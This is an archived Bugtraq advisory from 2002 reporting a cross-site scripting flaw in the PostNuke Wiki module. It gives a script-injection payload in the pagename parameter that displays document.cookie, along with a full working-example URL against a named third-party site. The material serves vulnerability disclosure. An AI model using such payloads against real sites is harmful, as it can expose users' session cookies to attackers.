Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

Wiki module postnuke Cross Site Scripting Vulnerability
From: Pistone <jorgep () spdps com ar>
Date: Tue, 16 Jul 2002 21:49:24 -0300
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ----------------------------------------------------
Class :         input Validation Error

Risk :            Due to the simplicity of the attack and the number of sites
                   that run phpwiki, the risk is classified as Medium to High.
- ----------------------------------------------------
This wiki is running as a PostNuke module. 
- ------------------------------------

Exploit:         pagename=|script|alert(document.cookie)|/script|

Change | x <>

Working Example :

http://centre.ics.uci.edu/~grape/modules.php?op=modload&name=Wiki&file=index&pagename=|script|alert(document.cookie)|/script|

- --------------------------------------------------------------------------------------------
programmer of wiki module and admin of postnuke-espanol.org receives a copy 
this report.
- --------------------------------------------------------


Salu2

Pistone
- - --------
Http://www.gauchohack.com.ar
Http://www.hackindex.org


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE9NL8cY47Vx76lNPkRAsNDAJ9M5eXRMxL1ASb2TlWaDaveotKAbgCZAQSz
PlAN98+qigqp8S9pkkfFRm4=
=c2FT
-----END PGP SIGNATURE-----

  By Date           By Thread  

Current thread:
  • Wiki module postnuke Cross Site Scripting Vulnerability Pistone (Jul 17)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]